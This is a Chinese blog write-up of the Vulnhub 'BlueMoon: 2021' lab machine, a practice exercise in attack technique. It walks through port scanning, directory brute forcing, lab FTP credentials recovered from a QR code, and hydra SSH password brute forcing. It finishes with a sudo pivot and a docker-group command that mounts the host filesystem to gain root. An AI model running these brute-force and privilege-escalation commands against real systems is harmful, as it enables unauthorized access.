首页 > 其他分享 >Vulnhub: BlueMoon: 2021靶机

Vulnhub: BlueMoon: 2021靶机

时间:2023-08-03 12:25:27浏览次数:60  
标签:111.174 BlueMoon jerry 192.168 sh 2021 docker robin Vulnhub

kali:192.168.111.111

靶机:192.168.111.174

信息收集

端口扫描

nmap -A -sC -v -sV -T5 -p- --script=http-enum 192.168.111.174

image

80端口目录爆破,发现文件:hidden_text

gobuster dir -u http://192.168.111.174 -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt

image

访问后发现二维码

image

image

扫二维码后得到ftp用户名:userftp,密码:ftpp@ssword

image

在ftp的文件中提示用户名和密码字典

image

image

利用提示的用户和密码字典爆破ssh

hydra -l robin -P ./p_lists.txt 192.168.111.174 -s 22 ssh -t 64

image

提权

robin用户sudo权限

image

/home/robin/project/feedback.sh文件内容

image

运行该脚本后切换到用户jerry

sudo -u jerry /home/robin/project/feedback.sh

image

可以发现jerry处于docker组,提权方法:https://gtfobins.github.io/gtfobins/docker/#shell

image

提升为root

docker run -v /:/mnt --rm -it alpine chroot /mnt sh

image

flag

image

标签:111.174,BlueMoon,jerry,192.168,sh,2021,docker,robin,Vulnhub
From: https://www.cnblogs.com/ctostm/p/17602973.html

相关文章

  • [鹤城杯 2021]EasyP
    [鹤城杯2021]EasyP题目来源:nssctf题目类型:web涉及考点:正则绕过1.还是先做代码审计<?phpinclude'utils.php';if(isset($_POST['guess'])){$guess=(string)$_POST['guess'];if($guess===$secret){$message='Congratulat......
  • 【专题】2015-2021年医疗机器人价值报告PDF合集分享(附原数据表)
    报告链接:http://tecdat.cn/?p=31419随着大量企业的涌入,服务机器人产业化即将到来。 阅读原文,获取专题报告合集全文,解锁文末40份服务机器人行业相关报告。经过多年的发展,我国已经实现了完整的服务机器人产业生态系统。在常态化疫情防控、人口老龄化、技术进步和政策支持等多种因......
  • 2021年互联网域名产业报告——从DoH到ODoH
    2021年互联网域名产业报告——从DoH到ODoH业务挑战域名解析加密技术成为应对域名劫持、记录篡改和用户隐私泄露,实现流量精准调度、提升用户体验的可行措施之一。互联网工程任务组(IETF)公布的DoH/DoT技术标准,提供了用户端与解析服务器端之间域名解析流量安全和隐私机制,在全球范围内......
  • 题解 P9406【[POI2020-2021R3] Nawiasowania】
    一个显然的思路是:在排列\(p\)的括号串合法的基础上,使得左括号在原括号串中尽量靠左,这样答案更有可能合法。于是我们求出这个原括号尽量靠左的括号串(下文称为“最优括号串”),然后check合法性即可。下文中\(s\)是排列\(p\)的括号串。当\(n=2\)时,唯一的填法是令\(s_1\get......
  • 恶意软件加密通信——2021年的报告,比较新
    NearlyhalfofmalwarenowuseTLStoconcealcommunicationsAsmoreoftheInternetusesTransportLayerSecurity,analysisofdetectiontelemetryshowsthevolumeofTLSencryptedcommunicationsbymalwarehasdoubledinayear.Writtenby SeanGallagherA......
  • [Ynoi Easy Round 2021] TEST_152(颜色段数均摊+扫描线)
    题目传送门solution简单题,考虑正着做扫描线,维护最后一次覆盖每个位置的修改时间,这个可以用\(set\)维护颜色段数均摊。那么显然对于一个以当前位置为右端点的询问,其答案就是所有最后修改时间大于等于左端点的位置的数的和。开一个树状数组维护最后一次修改时间是\(i\)的位......
  • vulnhub_DC_6_wp
    前言靶机地址:https://www.vulnhub.com/entry/dc-6,315/靶机下载地址:https://download.vulnhub.com/dc/DC-6.zip攻击机地址:192.168.20.135靶机探测nmap-sn192.168.20.0/24192.168.20.149为靶机地址端口扫描nmap-p-192.168.20.149详细信息扫描nmap-A-p22,80192.......
  • LiveVideoStack公众号2021年终盘点
    在2021年伊始,我们翻译过TsahiLevent-Levi关于今年WebRTC流行趋势的文章,文中提到2021年将是“还债”的一年,此前所进行的系统设计、软件架构或软件开发都将迎来最终结果;同时它也将是服务及传输质量不断优化的一年。在供给侧长期大于需求侧的当下,技术迭代的速度远远甩开新需求增长的......
  • CSP2021 游记
    前言这个人是蒟蒻,初二,在机房属于是垫底。今年是第一次参加CSP-S,第二次参加CSP-J。Day-1颓。Day0学校搞运动会,上午一边看运动会,一边复(摸)习(鱼)。中午\(1:00\)出发,在车上又看了会儿算法。全车的人都在颓。回了酒店后继续颓,感觉明天要凉。Day1早晨\(6:30\)起床,吃早饭......
  • [SWPUCTF 2021 新生赛]ez_unserialize
    [SWPUCTF2021新生赛]ez_unserialize题目来源:nssctf题目类型:web涉及考点:PHP反序列化1.检查一下源代码,发现Disallow:猜测大概有robots.txt,扫下后台看看:额,flag.php都扫出来了,但是进不去,还是老老实实看robots吧:2.看到题目了,开始代码审计<?phperror_reporting(0);show_......